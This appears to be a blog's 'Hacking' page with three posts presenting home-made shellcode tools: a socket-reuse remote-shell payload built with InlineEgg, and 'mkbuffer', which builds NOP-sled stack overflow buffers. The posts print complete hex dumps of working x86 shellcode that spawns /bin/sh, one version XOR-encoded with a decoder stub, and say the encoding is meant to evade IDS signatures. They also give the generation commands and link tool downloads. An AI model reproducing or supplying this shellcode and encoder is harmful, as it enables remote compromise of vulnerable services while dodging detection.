Category: Hacking

Made a nice shellcode using the python [inlineEgg](http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html) library. The shellcode is designed to smash the stack of a programm which is listen on a socket. The read buffer gets overflowed by the shellcode.
The code was tested an on older SUSE9.0, because current disto use [pie](http://www.gentoo.org/proj/en/hardened/pie-ssp.xml?style=printable=) and
[ssp](http://www.research.ibm.com/trl/projects/security/ssp/)

Features:

* Python script that generates the shellcode
* Re-uses the listen socket of the victim and connects it to new shell
* Scans for correct fd and peername
* Embedded Telnet client which connects to created remote shell
* Encoder to generate polymorph shellcode

[Download](http://optixx.org/download/inlineegg_reuse_socket.tar.gz)

Comments closed

Updated my shellcode generation tool. Added shellcode encryption, to hide from IDS which scan for well known strings in the shellcode, like ‘/bin/sh’. The encryption is quite simple, just add,sub,xor or move by an fixed offset. The tool added also a hook to decode the shellcode before it gets called.

Changelog:

* Use getopt for command line parsing
* Fixed off by one bug in hex dump output
* Added simple shellcode encryption

./mkbuffer -m gen -l 256 -c xor -o 2 -f CODE -e CODE
------------------------------------------------------
Start: 0x0x80499a0
End:   0x0x80499c9
Len:   0x0029 (41 bytes)
jump:  0x00000000
------------------------------------------------------
Crypt Shellcode 'xor' offset='2'
------------------------------------------------------
0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:eb 11 5e 31 c9 b1 36 80 74 0e ff 02 80 e9 01 75
0x0075:f6 eb 05 e8 ea ff ff ff 33 c2 b2 44 33 d9 33 cb
0x00cb:cf 82 e9 12 59 33 c2 8a 41 05 52 51 8b e3 b2 09
0x0009:33 d0 cf 82 ea e9 fd fd fd 2d 60 6b 6c 2d 71 6a
0x006a:5a 92 92 92 57 8b e7 55 54 33 f4 51 ea 8c 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
------------------------------------------------------
Writing Shellcode to 'CODE'
------------------------------------------------------
Starting Subshell
setup env $CODE
------------------------------------------------------

[Download](http://optixx.org/download/mkbuffer0.2.tar.gz)

Comments closed

Inspired by an article in german [Hakin9](http://www.hakin9.org/en/) Magazin from October 2005, i wrote a little programm to test and generate shellcode.A good place to learn about buffer overflows is [here](http://community.corest.com/~juliano/).
I found a interesting python framwork called [inlinegg](http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html) for shellcode generating. This make shellcode developing really easy and effective.

My simple tool is used to prepare buffers with shellcode.The actual asm code is done with [nasm](nasm.sourceforge.net) and linked a against a gcc main programm. The programm has three modes: *dump, exec* and *gen*.

**Dump** does a hexdump of the plain shellcode, usefull when tracing null bytes.

For testing the functionality of the shellcode you can use **exec** which simple calls the shellcode like function.

**Gen** is used to build a buffer with the actual shellcode. The code is hexdumped to stdout, raw code it written to stderr and also the enviroment var **$CODE** is set.
Also the target buffer size and stack jump address as to be passed to the program. The buffer ist first filled with the jump address and then the first half with NOPs overwritten. The shellcode gets copied to the middle of the buffer.

./mkbuffer gen 256  0x1234567
Start: 0x0x8048bb0
End:   0x0x8048bd9
Len:   0x29 (41 bytes)
jump:  0x1234567
90
0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0010:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0020:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0030:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0040:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0050:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0060:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0070:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31
0x0080:c0 b0 46 31 db 31 c9 cd 80 eb 10 5b 31 c0 88 43
0x0090:07 50 53 89 e1 b0 0b 31 d2 cd 80 e8 eb ff ff ff
0x00a0:2f 62 69 6e 2f 73 68 58 45 23 01 67 45 23 01 67
0x00b0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00c0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00d0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00e0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00f0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01
setup env $CODE

[Download](http://optixx.org/download/exploit.tar.gz)

Comments closed